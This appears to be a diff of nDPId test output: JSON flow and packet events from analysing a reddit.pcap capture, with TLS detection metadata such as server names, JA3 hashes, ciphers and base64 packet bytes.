{"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00712{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291690926,"flow_last_seen":1605291691043,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8556,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00712{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291690926,"flow_last_seen":1605291691044,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8557,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":164,"flow_first_seen":1605291686985,"flow_last_seen":1605291698522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2333,"flow_tot_l4_payload_len":45370,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} -00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605291690373,"flow_last_seen":1605291690520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":5684,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291684451,"flow_last_seen":1605291684451,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291684451,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1605291684451,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684451,"pkt":"qtsDr8lk5EKm5WPyht1gBBqZACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAKnFwBu4Sgd8UAAAAAoAL9IJAlAAACBAWgBAIICtTdYAcAAAAAAQMDBw=="} +00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291684451,"flow_last_seen":1605291684451,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291684451,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1605291684451,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684451,"pkt":"qtsDr8lk5EKm5WPyht1gDERGACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAKnF4Bu+Ka2YUAAAAAoAL9INBoAAACBAWgBAIICtTdYAcAAAAAAQMDBw=="} +00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291684452,"flow_last_seen":1605291684452,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291684452,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1605291684452,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684452,"pkt":"qtsDr8lk5EKm5WPyht1gCYCjACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3O4Bu5iiLjUAAAAAoAL9IMZSAAACBAWgBAIICql037gAAAAAAQMDBw=="} +00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1605291684476,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684476,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgKAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbucXOWkwh+EoHfGoBJXgJjYAAACBAV4AQMDAwQCCArC1zJs1N1gBw=="} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1605291684476,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291684476,"pkt":"qtsDr8lk5EKm5WPyht1gBBqZACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAKnFwBu4Sgd8blpMIggBAB+xzRAAABAQgK1N1gIMLXMmw="} +00967{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684451,"flow_last_seen":1605291684476,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291684476,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291684481,"flow_last_seen":1605291684481,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291684481,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1605291684481,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684481,"pkt":"qtsDr8lk5EKm5WPyht1gB3LfACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PABuxF7CxQAAAAAoAL9IHB8AAACBAWgBAIICql039UAAAAAAQMDBw=="} +00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1605291684485,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684485,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgKAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbucXoJUF9DimtmGoBJXgOayAAACBAV4AQMDAwQCCArC1zJ11N1gBw=="} +00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1605291684485,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684485,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc7vvL1mKYoi42oBJXgKSSAAACBAV4AQMDAwQCCArC1zJ1qXTfuA=="} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1605291684485,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291684485,"pkt":"qtsDr8lk5EKm5WPyht1gDERGACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAKnF4Bu+Ka2YaCVBfRgBAB+2qiAAABAQgK1N1gKcLXMnU="} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1605291684485,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291684485,"pkt":"qtsDr8lk5EKm5WPyht1gCYCjACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3O4Bu5iiLjb7y9ZjgBAB+yiDAAABAQgKqXTf2cLXMnU="} +00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684451,"flow_last_seen":1605291684485,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291684485,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684452,"flow_last_seen":1605291684486,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291684486,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1605291684551,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684551,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc8HTo0uYRewsVoBJXgNkGAAACBAV4AQMDAwQCCArC1zKKqXTf1Q=="} +01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684451,"flow_last_seen":1605291684551,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1605291684551,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291684551,"pkt":"qtsDr8lk5EKm5WPyht1gB3LfACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PABuxF7CxV06NLngBAB+1zSAAABAQgKqXTgG8LXMoo="} +01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684452,"flow_last_seen":1605291684551,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01269{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":27,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291684452,"flow_last_seen":1605291684551,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","server_names":"reddit.com,*.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.reddit.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:E9:D5:FE:EB:EF:68:34:55:FD:62:BA:C9:BB:04:D4:E3:22:18:81"}} +01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684451,"flow_last_seen":1605291684551,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684481,"flow_last_seen":1605291684552,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291684552,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684481,"flow_last_seen":1605291684592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291684592,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01270{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291684481,"flow_last_seen":1605291684593,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291684593,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","server_names":"reddit.com,*.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.reddit.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:E9:D5:FE:EB:EF:68:34:55:FD:62:BA:C9:BB:04:D4:E3:22:18:81"}} +00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686035,"flow_last_seen":1605291686035,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686035,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1605291686035,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686035,"pkt":"qtsDr8lk5EKm5WPyht1gDzZzACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PIBu+DxzH8AAAAAoAL9INmFAAACBAWgBAIICql05ecAAAAAAQMDBw=="} +00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686035,"flow_last_seen":1605291686035,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686035,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1605291686035,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686035,"pkt":"qtsDr8lk5EKm5WPyht1gCjLcACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PQBu\/EwLy4AAAAAoAL9IGaWAAACBAWgBAIICql05ecAAAAAAQMDBw=="} +00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686035,"flow_last_seen":1605291686035,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686035,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1605291686035,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686035,"pkt":"qtsDr8lk5EKm5WPyht1gAChDACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PYBu+yXuQoAAAAAoAL9IOFQAAACBAWgBAIICql05ecAAAAAAQMDBw=="} 